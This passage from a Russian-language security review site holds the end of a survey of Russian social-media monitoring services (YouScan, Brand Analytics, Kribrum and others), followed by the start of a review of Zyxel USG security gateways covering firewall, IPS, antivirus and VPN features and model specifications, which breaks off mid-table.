Поэтому в технологиях данных вендоров немалое внимание уделяется хранению данных и интеграции со смежными системами предприятия.Тем не менее, по данным отчета MarketsandMarkets, на долю розничного сектора приходится доминирующая доля мирового рынка аналитики в социальных сетях. При этом Северная Америка заняла основную долю на рынке аналитики в социальных сетях — около 70% населения активно пользуются социальными сетями, генерируя значительное количество контента. Следующую по величине долю рынка занимает Азиатско-Тихоокеанский регион, особенно Китай, а также быстрорастущие Индия и Юго-Восточная Азия. Российский рынок услуг мониторинга открытых источников информацииОтечественный рынок решений для мониторинга социальных медиа в интернете начал формироваться семь лет назад и с тех пор активно развивается. Существует стабильный интерес маркетологов к услугам мониторинга открытых источников. Кроме того, стали появляться нишевые сервисы, специализированные на информационно-аналитической поддержке бизнеса, — в таком случае, помимо СМИ и социальных сетей, в перечень источников входят базы ЕГРЮЛ, площадки госзакупок и другие источники.Далее мы не станем рассматривать информационно-аналитические системы, обогащающие корпоративную информацию данными из открытых источников и внешних баз, поскольку различия между этими рыночными нишами заключаются не только в различных потребителях, но и в технологических принципах.В России представлено около десятка сервисов мониторинга открытых источников информации, и поскольку порог вхождения на рынок достаточно низкий, количество конкурентов увеличивается. Такая насыщенность рынка делает его подвижным — крупные участники становятся частью мультикорпораций (например, покупка «АЙКУМЕН» Ростелекомом в 2015 году, покупка «Медиалогии» банком ВТБ в начале 2019 года), либо поглощают конкурентов (например, команда «Юскан» в 2018 году приобрела одного из своих конкурентов BrandSpotter), либо просто уходят с рынка (за последние годы закрыты такие сервисы, как Wobot, «Репутометр» и ряд небольших сервисов). Кроме того, крупные корпорации и госстуктуры также создают системы мониторинга информации под свои нужды — такие как «Катюша» (ООО «М13») для комплексного мониторинга СМИ и соцсетей в интересах министерств и государственных ведомств.Аудитория подобных продуктов — в первую очередь крупные и средние B2C-компании. Их задачи — своевременное выявление негативных отзывов, бенчмаркетинг, поиск лидеров мнений, евангелистов и антагонистов бренда, сравнение с конкурентами, а также оценка успешности рекламных кампаний.Другим крупным потребительским сектором выступают государственные ведомства и компании. В 2018 году в системе госзакупок было размещено порядка 500 заявок на закупки систем мониторинга открытых источников информации или аналогичных аналитических услуг. Объем заключенных контрактов составил 1 млрд рублей, при этом 70% всех закупок пришлось на основных поставщиков медиамониторинга — ООО «Медиалогия», ООО «М13» и ЗАО «Интерфакс». Среди задач госучреждений — определение рейтинга чиновников, отношения к государственным инициативам, выявление социальных трендов и срезов общественного мнения.Следующая группа пользователей — журналисты и СМИ, а также представители медиаиндустрии, выявляющие охват публикаций, перепечатки и цитируемость.Помимо этого, сервисы востребованы у маркетинговых и PR-агентств, которые используют их для внешней независимой оценки результатов своей работы и оказывают с их помощью услуги медиамониторинга.Перспективной нишей для развития услуг мониторинга открытых источников является рынок информационной безопасности. Анализ упоминаний позволяет своевременно обнаруживать информационные атаки (вбросы, посев негативных отзывов, дискредитацию первых лиц компании и т. д.), их источники, а инструментарий работы с соцсетями из единого окна дает возможность оперативной реакции для минимизации ущерба. Функциональные возможности систем мониторинга открытых источников информацииСредняя система мониторинга открытых источников информации представляет собой краулер, индексирующий различные интернет-ресурсы и сохраняющий результаты в собственное хранилище. В личном кабинете пользователь заводит тему мониторинга, указывая ключевые слова, синонимы, заменители и косвенные атрибуты объектов поиска, и сервис начинает анализировать архив — это может занять от нескольких минут до суток. В проиндексированном массиве сервис отображает различные атрибуты упоминаний (социал-демографические данные авторов, охват публикации, географическое распределение), лингвистические алгоритмы определяют тональность упоминаний и схожесть публикаций. Помимо этого, сервисы могут предоставлять дополнительные аналитические возможности — оценка влиятельности автора, значимости публикации и многое другое. Обычно пул источников охватывает все популярные социальные сети, федеральные и крупные региональные онлайн-СМИ, агрегаторы отзывов. После того как в 2016 году Facebook и Instagram ввели ограничения к доступу сторонних приложений по API, работа с отзывами в этих системах вызывает определенные сложности у сервисов мониторинга. Точность оценки тональности, глубина поиска и поддержка специализированных интернет-ресурсов разнятся от сервиса к сервису, поэтому не всегда популярный инструмент может подойти под задачи отдельно взятой компании.Эталонными поставщиками услуг мониторинга упоминаний в Рунете считаются компании «Крибрум» (ГК InfoWatch), Brand Analytics и YouScan — они предоставляют наиболее широкий набор функций, востребованных у большей части потребителей рынка. Конкурирующие с ними сервисы IQBuss и SemanticForce специализируются на крупных клиентах, требующих индивидуального подхода и доработки решений под специализированные задачи. Для несложных задач или небольших компаний существует и бесплатный сервис Babkee, имеющий существенные функциональные ограничения, но справляющийся с основной задачей поиска упоминаний.Чтобы снизить уровень конкуренции, новые игроки рынка сразу начинают работать с узкоспециализированными нишами — например, сервис Angry Scan предоставляет специальный интерфейс для регионально распределенных компаний с большой филиальной сетью. Кроме того, сервисы мониторинга СМИ также начали наращивать функции анализа социальных сетей — например, сервис «Медиалогия» с недавних пор вывел отдельный инструмент мониторинга соцсетей, а анонсированный в 2017 году сервис Яндекс.Медиана также обещает добавить мониторинг соцмедиа при выходе на рынок. Тем не менее решения, изначально специализирующиеся на мониторинге социальных сетей, представлены в большинстве. Они обладают более широкими функциями, но имеют меньший охват других источников, по сравнению с теми продуктами, которые сфокусированы на СМИ.Все популярные на рынке сервисы предоставлены в виде веб-интерфейса с доступом в личный кабинет за ежемесячную абонентскую плату. Диапазон абонентской платы в месяц — от 5000 до 350 000 руб. в месяц, кроме того есть индивидуальные тарифы для особо крупных заказов. Стоимость лицензии зависит от количества объектов мониторинга, количества сохраняемых упоминаний, глубины ретроспективного анализа и индивидуальных дополнительных функций. Обзор систем мониторинга открытых источников информацииAngry ScanНовый участник рынка мониторинга информации определил для себя целевую нишу компаний с развитой филиальной сетью. Сервис предназначен для сбора отзывов в привязке к географическим данным и работы с ними в собственной внутренней CRM-системе. Помимо сервиса компания представляет услуги аналитиков для сопровождения работы — например, для ручной разметки релевантных отзывов и составления ежедневных дайджестов. Стоимость сервиса составляет от 20 000 до 50 000 рублей за месяц использования. Рисунок 1. Географическое распределение отзывов в Angry Scan Особенности сервиса Angry Scan:Мониторинг отзывов с географической привязкой.Возможность работы с отзывами внутри системы.Аналитическое сопровождение работы сервиса.Подробнее с сервисом можно ознакомиться на сайте производителя.BabkeeКомпания Ingate Development (ООО «ЭП») анонсировала сервис Babkee в 2011 году. С тех пор он стал наиболее массовым инструментом мониторинга социальных сетей и онлайн-СМИ. Это один из немногих сервисов, полностью доступных бесплатно. Однако возможности сервиса заметно уступают платным аналогам — как по количеству контролируемых источников, так и по аналитическим возможностям. Пользователь найдет упоминания в социальных сетях и блогах, допускающих API-интеграцию (Twitter, ВКонтакте, LiveJournal, Liveinternet и др.), но часть популярных социальных сетей, агрегаторы отзывов, видеохостинги, комментарии в интернет-магазинах и многое другое останется в тени. В базовых отчетах также анализируется тональность упоминаний, социально-демографические данные авторов и география, но ложных срабатываний слишком много, чтобы использовать этот инструмент без дополнительной ручной проверки. Тем не менее, для периодического мониторинга упоминаний многим пользователям будет достаточно предлагаемых функций. Рисунок 2. Лента упоминаний в сервисе Babkee Особенности сервиса Babkee:Полностью бесплатный доступ.Базовые аналитические функции.Возможность подключить дополнительные источники по RSS.Подробнее с сервисом можно ознакомиться на сайте производителя.Brand AnalyticsСистему мониторинга социальных медиа Brand Analytics создал в 2012 году системный интегратор «Ай-Теко», с тех пор решение вошло в состав лидеров рынка, и направление выделилось в отдельную компанию «ПалитрумЛаб». Система изначально ориентирована на работу с социальными сетями для среднего и крупного розничного бизнеса, поэтому функции сервиса направлены не столько на аналитические задачи, сколько на командную работу сотрудников клиента. Система Brand Analytics предоставляет все необходимые функции для командной работы — разграничение доступа, возможность реагирования на упоминания сразу из интерфейса сервиса, экспорт сообщений в различные форматы, группировка дублей, оповещения о важных событиях.Существенное преимущество сервиса — полнота источников информации. Brand Analytics анализирует все популярные социальные сети, блоги, интернет-СМИ, агрегаторы отзывов, форумы и видеохостинги. В рамках партнерских проектов в сферу мониторинга системы включаются крупные информационные ресурсы, не предоставляющие API-доступ к контенту — такие как Яндекс.Маркет, «Одноклассники» или Google +. Кроме того, Brand Analytics решает задачу мониторинга отзывов на персональных страницах Facebook, хотя количество индексируемых страниц этой социальной сети на порядок меньше, чем ВКонтакте или Instagram. Аналитические функции сервиса также позволяют определять тональность упоминаний, тематические категории, а также собирать мета-данные авторов — географическую привязку и демографические портреты. Стоимость доступа к сервису составит от 8500 до 99 000 руб. за месяц использования, пробный период 7 дней доступен сразу после регистрации на сайте производителя. Рисунок 3. Сводный отчет в сервисе Brand Analytics Особенности сервиса Brand Analytics:Высокая скорость индексации — упоминания попадают в базу в течение нескольких минут после публикации.Мониторинг упоминаний на персональных страницах в Facebook, Instagram и «Одноклассниках».Подключение новых источников по запросам клиента — до 10 сайтов в месяц, источников с RSS — без ограничений.Мониторинг Telegram-каналов.Возможность скрыть нерелевантные сообщения (спам, благотворительность, интернет-торговля, аварии и т. п.).Возможность ответов к комментариям из интерфейса системы.Мобильное приложение для работы с сервисом в операционной системе iOS.Включен в реестр отечественного ПО.Подробнее с сервисом можно ознакомиться на сайте производителя.IQBuzzCистема мониторинга социальных сетей IQBuzz была создана в 2011 году компанией «Айкумен ИБС», специализирующейся на отраслевых и специализированных решениях анализа данных. После продажи 75% компании Ростелекому в 2015 году розничный сервис мониторинга открытых источников данных был вынесен в компанию «Айкубаз». Функциональность сервиса ориентирована на владельцев бизнеса, пресс-службы коммерческих структур и маркетинговые и PR-агентства. Краулер системы сохраняет информацию из всех популярных соцсетей (исключая персональные страницы Facebook), форумов и блогов, региональных и федеральных интернет-СМИ. Пользователям доступна выгрузка упоминаний в удобном формате, аналитические сводки по географическим и демографическим признакам авторов, определение тональности сообщений. В системе реализованы возможности гибкой фильтрации — вручную можно установить стоп-слова, указывающие на нерелевантность упоминания, добавить синонимы для каждой группы, а также настроить оценку тональности. Не так давно сервис обновил интерфейс, больше места уделив аналитическим сводкам и отчетам. Стоимость месяца пользования сервисом составит от 7900 до 54900 руб. Рисунок 4. Редактирование рубрики в сервисе IQBuzz Особенности сервиса IQBuzz:Доступ к ретроспективному поиску упоминаний в архиве до 10 лет без доплат.Возможность отвечать на сообщения прямо из сервиса от имени компании.Возможность подключения новых источников по запросу клиента.Интеграция с Helpdesk-системами (Zendesk, «Мегаплан»).Интеграция с CRM-системами.Подробнее с сервисом можно ознакомиться на сайте производителя.SCANСервис информагентства «Интерфакс» входит в тройку популярных систем медиа-анализа в госзакупках. В базе данных сервиса более 23 тысяч источников, включая основные информационные агентства, газеты, информационные интернет-издания, печатные газеты и журналы, сайты, радио и ТВ. Сервис специализируется на официальных источниках информации, поэтому не мониторит блоги, форумы и социальные сети. SCAN умеет оценивать тональность публикаций, группировать перепечатки и определять первоисточники, а также категоризировать публикации по тематике сюжета. При этом интеграция с другим продуктом «Интерфакса» — сервисом проверки контрагентов СПАРК — расширяет возможности сервиса до полноценной системы бизнес-аналитики. Рисунок 5. Лента публикаций в сервисе SCAN Особенности сервиса SCAN:Полный доступ к публикациям в СМИ.Оповещения о важных публикациях.Мобильное приложение с персональными настройками отображения публикаций.Интеграция с сервисом проверки юридических лиц для решения ИБ-задач.Подробнее с сервисом можно ознакомиться на сайте производителя.SemanticForceУкраинский разработчик системы мониторинга социальных медиа, имеет автономное представительство в Московской области. Компания занимает небольшую долю рынка и специализируется на крупных нестандартных заказчиках, требующих индивидуального подхода и персональных решений. Хотя интерфейс веб-сервиса немного устаревший, в системе SemanticForce используют собственные семантические алгоритмы и технологии парсинга социальных сетей, что позволяет добиться достаточно большого охвата и подключать специализированные источники. Среди стандартных социальных сетей, форумов и СМИ в пул источников системы попали сервис SlideShare, LinkedIn, отзывы в интернет-магазинах. Кроме того, производители заявляют о возможности подключения дополнительных источников информации по необходимости. Стоимость месяца пользования сервисом составляет от 9750 до 81250 руб. Рисунок 6. Интерфейс разметки тональности в SemanticForce Особенности сервиса SemanticForce:Возможность получать упоминания из ряда источников без задержек по времени.Распознавание логотипов на изображениях.Возможность самостоятельно добавить любой онлайн-источник на мониторинг.Мониторинг иностранных СМИ (250000 ресурсов в 150 странах мира).Технология отслеживания поведения автора упоминаний и его отношения к объекту мониторинга.Интеграция с GoogleAnalytics для маркетинговых исследований.Подробнее с сервисом можно ознакомиться на сайте производителя.YouScanНебольшой киевский стартап за 10 лет своего существования вошел в лидеры и стандарты отрасли мониторинга социальных медиа в СНГ. В России ООО «Юскан» занимает лидирующие позиции на рынке по числу клиентов (данные AdIndex) и усиливает свои позиции через поглощение конкурентов (покупка сервиса BrandSpotter в 2018 году). Функционально система представляет собой гибкий набор инструментов для мониторинга социальных медиа. YouScan находит отзывы во всех популярных социальных сетях, включая Facebook, Telegram-каналы и «Одноклассники», а также в блогах, форумах, сайтах отзывов и в онлайн-СМИ. Помогает выявить лидеров мнений и хейтеров бренда, определяет тематику и тональность упоминаний. Мониторинг упоминаний в комментариях к публикациям Instagram возможен только по хештегу. Большинство упоминаний в комментариях к публикациям попадают в систему с задержкой от нескольких секунд до нескольких часов. Пользователю доступно большое количество настроек, фильтров и вариантов реакций на упоминания для адаптации сервиса под свои бизнес-процессы. При этом современный интерфейс веб-сервиса интуитивно понятен и все функции несложно найти. Каскадная система аналитических отчетов позволяет проваливаться от общих графиков к конкретным событиям. Главный недостаток сервиса — достаточно высокая стоимость по сравнению с конкурентами. Месяц пользования системой обойдется от 35000 до 350000 руб., демоверсия предоставляется по запросу. Рисунок 7. Распознавание логотипов на изображениях в сервисе YouScan Особенности сервиса YouScan:Распознавание изображений логотипов и ситуации потребления на иллюстрациях и фото пользователей соцмедиа даже в тех постах, где название бренда не упоминается.Нет ограничений на количество пользователей, доступна постановка задач и разграничение прав доступа к темам системы.Возможность подключить мониторинг обновлений конкретных каналов информации, независимо от публикуемого контента.Интеграция с CRM-платформами.Мультиязычный интерфейс (доступны русский, английский и украинский языки).Подробнее с сервисом можно ознакомиться на сайте производителя.КатюшаСервис, созданный компанией «М13» в 2017 году специально для задач медиамониторинга в госсекторе. Информация сгруппирована по времени, информационным поводам, тематикам, событиям, персонам и типам СМИ. Для оценки масштаба и качества распространения информации в системе используются тональность публикаций, их количество и охват аудитории. Оперативность достигается коротким интервалом сканирования — сообщения появляются в системе в интервале времени от 1 до 10 минут после их публикации на сайте источника. Сообщения с пометкой «Срочно» по наиболее важным темам по запросу пользователя могут отправляться в виде sms, email, и push-уведомлений. Рисунок 8. Список событий в сервисе «Катюша» Особенности сервиса «Катюша»:Отображение упоминаний с задержкой в 10 минут после публикации.Срочные уведомления о критически важных публикациях.Круглосуточная поддержка пользователей.Доступ к результатам мониторинга через мобильные приложения на iOS и Android.Подробнее с сервисом можно ознакомиться на сайте производителя.КрибрумОдин из старейших сервисов мониторинга открытых источников информации создан маркетинговым агентством «Ашманов и партнеры» и компанией InfoWatch. Система охватывает как платформы социальных сетей, блогов и форумов, так и доступных онлайн СМИ, включая сайты радиостанций и телевидения, а также видеохостинги и отраслевые сайты. Краулер системы находит упоминания за промежуток от 15 минут до 2-4 часов после публикации. Возможности платформы позволяют автоматизировать большую часть аналитической работы — определять тональность упоминаний, тематические категории, географическую распределенность, вес авторов и примерный охват публикаций. Можно приобрести как лицензию на доступ к платформе, так и услуги аналитиков «Крибрума» для точной настройки системы под конкретные кейсы, или отдельные отчеты о текущем состоянии инфополя по заданной теме. Сервис ориентируется на крупных бизнес-пользователей, данные о стоимости не разглашаются в открытых источниках, пробная версия предоставляется потенциальным клиентам по запросу. Рисунок 9. Отображение найденных упоминаний в «Крибруме» Особенности сервиса «Крибрум»:Широкий охват региональных и отраслевых источников.Собственная лингвистическая база (правильная обработка отрицания в упоминаниях).Способность различать усиления и сравнения с конкурентами.Для нестандартных кейсов доступны дополнительные услуги аналитиков.Включен в реестр отечественного ПО.Подробнее с сервисом можно ознакомиться на сайте производителяМедиалогияКомпания «Медиалогия» — старейший поставщик услуг мониторинга СМИ. С 2003 года сервис специализируется на мониторинге региональных СМИ, ежедневно предоставляя клиентам сводки об упоминаниях ключевых слов в печати, на ТВ и радио. До 2016 года сервис являлся основным поставщиком услуг мониторинга СМИ для государственных заказчиков. С недавних пор компания добавила направление мониторинга соцмедиа. Как заявляет производитель, система охватывает 800 млн соцмедиа и 49 тысяч СМИ — это наибольший объем источников среди аналогов. Однако полнота анализа социальных сетей пока что остается под вопросом — судя по публичным отчетам, мониторинг социальной сети Facebook охватывает только публичные группы, либо упоминания, помеченные хештегом. Аналитические инструменты сервиса достаточно гибкие и разнообразные, что полезно для работы с большим пулом упоминаний.Помимо стандартных услуг аналитики и мониторинга, «Медиалогия» предлагает премиальные услуги ГЛАСС и «Призма», позволяющие формировать картину дня, персональную медиабазу, рабочее место руководителей и контролировать установленные показатели. Рисунок 10. Работа с инцидентами в сервисе «Медиалогия» Особенности сервиса «Медиалогия»:Наиболее полный мониторинг СМИ.Большое количество преднастроенных отчетов.Мониторинг Telegram-каналов.Возможность настроить инциденты для дальнейшей работы с упоминаниями.Подробнее с сервисом можно ознакомиться на сайте производителя. ВыводыВысокая конкуренция на российском рынке систем мониторинга открытых источников информации заставляет участников активно развивать свои сервисы, поэтому функциональные возможности региональных систем как минимум не уступают ведущим мировым вендорам. За последние пару лет такие функции, как мониторинг Telegram-каналов, оценка тональности и значимости упоминания, распознавание изображений, — уже стали ожидаемым стандартом. Однако технические ограничения, созданные Facebook для сторонних краулеров, не получилось преодолеть у большинства платформ мониторинга. Учитывая, что это одна из наиболее популярных платформ у платежеспособного сегмента аудитории, технология обеспечивает весомые конкурентные преимущества.Кроме того, усиливается конкуренция по доступности и качеству дополнительного сервиса — услуги аналитиков и индивидуальные настройки предлагают практически все вендоры.Профиль рынка распределился характерным для российской экономики образом — 50% рынка составляют единичные сверхкрупные заказы и госконтракты, обслуживаемые 3-5 крупными вендорами, остальные 50% — розничные заказы средних предприятий, медиакомпаний и индивидуальных заказчиков. Учитывая ежегодный рост затрат на мониторинг медиа в госсекторе, логично, что крупные госкорпорации стремятся включить в свои активы производителей перспективных платформ. При этом наиболее перспективным путем развития технологии мониторинга открытых источников информации становится переход от задач маркетинга и PR к бизнес-аналитике за счет интеграции с другими открытыми источниками информации — тендерными площадками, системами мониторинга юридических лиц, системами информационной безопасности и т. п. Первые шаги в этом направлении уже сделали несколько вендоров (IQPlatform, Data Plexus, «Спарк-Скан»). Такая парадигма дает возможность конкурировать за часть клиентов с крупными информационно-аналитическими платформами для бизнеса (как IBM Watson, «Гарда Аналитика» или Palantir).
Обзор Zyxel USG Series, унифицированных шлюзов безопасности
April 18, 2019, 2:08 am

Корпоративные унифицированные шлюзы безопасности Next Generation Performance Series (Zyxel USG) от популярного много лет на российском рынке тайваньского производителя Zyxel Communications Corporation поддерживают все современные защитные технологии — межсетевой экран нового поколения (NGFW), антивирус, антиспам, модуль контентной фильтрации, контроль приложений, организацию защищенного канала VPN и др. ВведениеМодельный ряд унифицированных шлюзов безопасности Zyxel USGОсновные функциональные возможности линейки Zyxel USGКак работают функции безопасности в Zyxel USGМладшие модели Zyxel USG40/40W/60/60WСтаршие модели Zyxel USG110/210/310 и USG1100/1900Особенности администрирования устройств линейки Zyxel USGСервисы и лицензирование устройств линейки Zyxel USGВыводы ВведениеНа рынке корпоративной информационной безопасности все чаще встречаются тезисы о том, что средства защиты информации, каждый со своей отдельной функциональностью, не работают, поскольку реальному бизнесу нужны законченные решения. Большинству руководителей среднестатистических компаний не так важно, что ваше средство умеет лишь что-то одно: защищает лучше всего от вредоносов, спама, превосходно фильтрует веб-трафик или способно организовать VPN. Необходим комплексный продукт, который сможет обеспечить адекватный уровень кибербезопасности, при этом обладая максимальным набором инструментов на борту.Для решения этой задачи разработаны унифицированные шлюзы безопасности Next Generation Performance Series Zyxel USG (решения класса UTM — Unified Threat Management) с модулем NGFW (Next Generation Firewall) на борту.Компания Zyxel уже более 30 лет производит устройства для организации сетевой инфраструктуры всех масштабов и знакома практически любому айтишнику в России еще по Dial-Up-модемам с конца 1990-х — начала 2000-х. Традиционно мы привыкли встречать Zyxel в сегменте устройств для дома и SOHO, однако начиная с 2015 года вендор вышел на рынок кибербезопасности, выделив ИБ в отдельное направление. Линейка корпоративных решений Zyxel достаточно широка, охватывает все сегменты рынка и призвана удовлетворить потребности практически любой компании. Рисунок 1. Портфель продуктов Zyxel для обеспечения корпоративной безопасности Решения по обеспечению информационной безопасности представлены четырьмя классами устройств: средства построения сетей VPN (линейка Zywall VPN), решения по защите от целенаправленных атак (линейка Zywall ATP), SD-WAN шлюзы Nebula с облачным централизованным управлением (линейка NSG Series) и универсальные шлюзы безопасности (Zywall USG). Cегодня мы подробно поговорим о Zyxel USG Performance Series. Модельный ряд унифицированных шлюзов безопасности Zyxel USGЛинейку USG Performance Series можно разделить на две группы моделей:USG40/40W/60/60W (младшие модели) — используются для защиты небольших и микропредприятий, подходят для решения задач по защите от вредоносных программ и запрещенных приложений и рекомендованы к применению там, где не требуются высокие скорости или обязательная отказоустойчивость;USG110/210/310/1100/1900 (старшие модели) — разработаны специально для удовлетворения потребностей современных крупных предприятий и сектора SMB+, которым помимо эффективного решения для оптимизации приложений и комплексной защиты сети нужна высокая доступность системы безопасности и консолидированное применение политик.Краткие характеристики всех моделей линейки приведены ниже. Таблица 1. Ключевые характеристики моделей устройств Zyxel USG SeriesМодельUSG40/40WUSG60/60WUSG110USG210USG310USG1100USG1900Пропускная способность межсетевого экрана, мбит/с4001,0001,6001,9005,0006,0007,000Максимальное число одновременных клиентских сессий50,000100,000150,000200,000500,0001,000,0001,000,000Пропускная способность UTM (антивируса и средства предотвращения вторжений), мбит/с5090450500550650710Пропускная способность средства предотвращения вторжений, мбит/с9515059066090010001200Пропускная способность антивируса, мбит/с5090450500550650710Поддержка сервисов Amazon VPCДаДаДаДаДаДаДаВозможность собрать отказоустойчивый кластер (HA)—ДаДаДаДаДаПоддержка управления точками доступа WiFi’—ДаДаДаДаДаФункция авторизации Facebook WiFiДаДаДаДаДаДаДаС полным перечнем всех продуктов компании Zyxel можно ознакомиться на официальном сайте. Основные функциональные возможности линейки Zyxel USGУстройства Zyxel серии USG соответствуют требованиям, предъявляемым к комплексным решениям класса UTM, и состоят из следующих модулей безопасности: межсетевой экран следующего поколения (NGFW), модули построения IPSec VPN и SSL VPN, средство обнаружения и предотвращения вторжений (IDP), контроль приложений, антивирус, антиспам, модуль контентной фильтрации, проверка и инспекция SSL-трафика (последний — только для моделей USG110/210/310 и USG1100/1900).Наличие этих функций призвано пресекать использование веб-приложений в личных целях, например, злоупотребление социальными сетями, видеохостингами и иным развлекательным контентом. Инструменты безопасности включают в себя интересную функцию — SSL Inspection, что позволяет детектировать угрозы в зашифрованном SSL-трафике. Самая свежая версия модуля Content Filtering 2.0 реализует фильтрацию трафика к сайтам, работающим по протоколу HTTPS, и обеспечивает безопасный серфинг пользователей в браузерах, блокировку IP по геометкам и другие функции защиты веб-соединений. Все устройства поддерживают работу с протоколами как IPv4, так и IPv6. Более детально функции безопасности разобраны в следующем разделе.Список технологий, реализованных в Zyxel USG, в полной мере оправдывает отнесение линейки к решениям класса «все-в-одном». И, что самое главное, Zyxel USG поддерживает все возможные технологии и способы подключения пользователей, без необходимости смены привычных для работы инструментов. Управлять точками доступа Wi-Fi, любыми каналами (проводные каналы, USB-модемы), настраивать защищенную сеть VPN между офисами, контролировать работу и оптимизировать пользователей в интернете, а также обеспечить информационную безопасность в комплексе — все это доступно в рамках одного установленного устройства Zyxel USG. Рисунок 2. Наиболее интересные функциональные возможности устройств Zyxel USG Series Шлюзы серии USG обеспечивают бесперебойную работу в интернете с поддержкой двух (для моделей USG40/40W/60/60W) или более (для моделей USG110/210/310 и USG1100/1900) сетей по технологии multi-WAN для активной балансировки нагрузки или активно-пассивной отказоустойчивости. Кроме того, устройства оснащаются USB-портами для возможности подключения внешних сотовых модемов.В устройства серии USG интегрирован контроллер WLAN с поддержкой протокола CAPWAP (Control And Provisioning of Wireless Access Points — специализированный туннельный протокол, используемый для взаимодействия контроллера и точек радиодоступа), что обеспечивает централизованную аутентификацию, доступ и управление несколькими точками доступа в сети. В зависимости от конкретной модели и активированной лицензии универсальный шлюз одновременно может управлять до 130 точками доступа, при этом поддержка 2 точек доступа включена по умолчанию для всех устройств. Таким образом, компания может масштабировать беспроводную сеть и предоставлять Wi-Fi в отдельных зонах, например в переговорных комнатах и на ресепшен, при этом обеспечивая необходимый уровень разграничения доступа. Для этого на борту устройств имеются такие функции управления хотспотами, как система учета трафика и биллинг (для разворачивания платного Wi-Fi). Чтобы неавторизированные клиенты могли получить доступ к внешним ресурсам без сложной процедуры авторизации, реализована отдельная функция Walled Garden (позволяет задавать список разрешенных таким пользователям адресов). Zyxel USG поддерживает аутентификации пользователей одновременно разными методами, возможность авторизоваться через социальные сети и прописать собственное пользовательское соглашение (User Agreement), что повышает удобство, позволяет организовать дополнительные платные услуги и выполнить некоторые формальные требования. Как работают функции безопасности в Zyxel USGС помощью Zyxel USG компания может построить многоуровневую систему защиты своей сети от различных угроз и осуществлять блокировку доступа к подозрительным ресурсам. Реализованные технологии не только позволяют ограничить использование полосы пропускания отдельных приложений с целью повышения общей скорости интернета, но и улучшают продуктивность работы сотрудников компании.Пожалуй, две ключевые задачи любого UTM-решения — это обеспечить безопасную работу пользователей компании в интернете, а также организовать надежное и защищенное соединение между удаленными площадками.Для решения первой задачи устройства Zyxel линейки USG оснащены набором технологий защиты от вредоносных программ и оптимизации приложений. Рисунок 3. Концепция обеспечения безопасности компании при помощи Zyxel USG Series Межсетевой экран нового поколения (Next Generation Firewall) поддерживает следующие технологии: режимы route/bridge, инспекция пакетов (Stateful packet inspection), прозрачность SIP/H.323 через NAT, разбор прикладных протоколов (ALG), детектирование аномалий в трафике, базовая защита от DDoS.Технология Intrusion Detection and Prevention (IDS/IPS) поддерживает: режимы route/bridge, сигнатурный и поведенческий анализ, автоматическое обновление и тонкую донастройку сигнатур вручную (включение/отключение, создание собственных списков и т. п.), возможность конфигурации индивидуальных профилей защиты.Application Patrol выполняет следующие функции: полный контроль использования популярных веб-ресурсов и приложений пользователями с поддержкой категорий (более 15) и гибкой настройкой, шейпинг трафика от определенных приложений, дополнительная авторизация пользователей, статистика и отчеты, специальные IDP/ADP-коннекторы для соцсетей.В устройствах реализованы антивирус Zyxel AV (движок от партнера — Bitdefender) и антиспам Zyxel AS (движок от партнера — CyREN), которые поддерживает: более 650 000 сигнатур вирусов, все популярные почтовые протоколы, HTTP, файлы неограниченного размера, автоматическое обновление баз, фильтрацию по IP-репутации, движок Recurrent Pattern Detection (RPD), распознавание X-Header, черные и белые списки, отчеты.Интегрированный в Zyxel USG Content Filtering 2.0 обеспечивает фильтрацию социальных сетей, вредоносных сайтов, блокировку сайтов (в том числе работающих по протоколу HTTPs), в том числе по ключевым словам, а также заданием отдельно черных и белых списков URL-адресов. Модуль осуществляет блокировку активного содержимого страниц в браузерах пользователей (Java Script, ActiveX и cookies), проверяет URL сайтов по собственной облачной базе потенциально опасных адресов. Реализована возможность ограничения серфинга пользователей по гео-IP и задания отдельных страновых политик. Для удобства администрирования и прозрачного взаимодействия с пользователями с помощью Content Filtering можно настроить перенаправление запросов (web-редирект) с выводом собственного информационного сообщения. Стоит отметить, что число подключаемых (пропускаемых через модуль Content Filtering) пользователей искусственно ничем не ограничено.Для организации защищенного VPN-соединения между филиалами Zyxel USG позволяет построить соединения по технологии site-to-site IPSec VPN. Ключевые географически удаленные друг от друга площадки с повышенными требованиями к надежности соединения возможно подключать с дополнительным применением IPSec VPN HA (load balancing and failover) для обеспечения постоянной доступности VPN-сессий. Отдельные пользователи могут получить защищенный доступ к ресурсам компании со своих персональных устройств (компьютеров, планшетов, смартфонов) через SSL, IPSec или L2TP over IPSec VPN. Кроме того, шлюз Zyxel USG способен интегрироваться с Amazon VPC (посредством IPSec VPN) для безопасного доступа к размещенным там приложениям. Рисунок 4. Технология построения VPN с помощью Zyxel USG Series В рамках реализации IPSec VPN шлюз поддерживает все современные технологии данного стека:алгоритмы шифрования AES, DES, 3DES;VTI (Virtual Tunnel Interface) — применяется для создания маршрутизирующего интерфейса с целью более удобного управления и терминирования IPSec-туннелей;управление ключами (manual key, IKEv1, IKEv2 with EAP);прозрачность IPSec через NAT;обнаружение Dead peer (неиспользуемых, «мертвых» пиров);стандарт сертификатов и ключей согласно PKI X.509;организация VPN-кластера для повышенной доступности High Availability (HA) в двух вариантах: loadbalancing (балансировка нагрузки) и failover (отказоустойчивый);построение L2TP и GRE туннелей поверх IPSec;поддержка взаимодействия с протоколами iOS L2TP/IKE/IKEv2 VPN (от компании Cisco);гибкое и настраиваемое подключение VPN-клиентов.Модуль SSL VPN поддерживает любые браузеры операционных систем Windows и macOS и широкий набор протоколов (HTTP, FTP, SMTP, POP3, IMAP4). В модуле реализована технология full-tunnel (установка поверх дополнительного PPTP-соединения от клиента до шлюза). Для дополнительного удобства и прозрачности для пользователей можно настроить двухшаговую аутентификацию и кастомизировать клиентский портал на шлюзе. Младшие модели Zyxel USG40/40W/60/60WСохраняя все функции полноценного UTM, Zyxel USG USG40/40W/60/60W обеспечивают безопасность корпоративного класса (включая преимущества Next Generation Firewall) по цене, доступной для небольших компаний. Кроме того, в этих устройствах используется Fanless (безвентиляторный) метод охлаждения, что особенно важно в отсутствии выделенных серверных комнат на малых предприятиях. Таблица 2. Внешний вид и базовые параметры устройств Zyxel USG USG40/40W/60/60WМодельСпецификацияUSG40USG40WUSG60USG60W Интерфейсы3 x LAN/DMZ, 1 x WAN, 1 x OPT3 x LAN/DMZ, 1 x WAN, 1 x OPT4 x LAN/DMZ, 2 x WAN4 x LAN/DMZ, 2 x WANПорты USB1122Консольный портДа (RJ-45)Да (RJ-45)Да (DB9)Да (DB9)Возможность монтажа в стойкуНетНетДаДаБесшумная технология охлажденияДаДаДаДаМакс. число интерфейсов VLAN881616Максимальное число туннелей IPSec 